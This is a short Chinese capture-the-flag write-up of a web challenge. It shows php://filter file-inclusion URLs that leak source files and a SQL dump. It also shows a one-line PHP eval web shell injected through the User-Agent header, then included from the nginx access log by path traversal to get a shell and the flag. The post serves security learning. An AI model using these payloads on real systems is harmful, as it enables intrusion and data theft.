[Web]biubiubiu- jaivy xp0int Posted on May 7 2018 利用文件包含漏洞读取源码 http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=login.php http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=conn.php http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=send.php http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=users.sql 做题思路是写web 日志 然后利用包含getshell,具体做法是在User-Agent处写入php一句话木马 ``` User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0<?php @eval($_POST['cmd']);?> ``` 然后把日志文件包含进来 http://3da2fbd6c6394f4e9251b85d50814a0717f9385e66a04deb.game.ichunqiu.com/index.php?page=../../../../../../../var/log/nginx/access.log 然后连接数据库查询获取flag ![title](https://leanote.com/api/file/getImage?fileId=5aefff63ab6441023b0010ab) 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Web]shopping log - jaivy [Web]simple upload - jaivy
没有帐号? 立即注册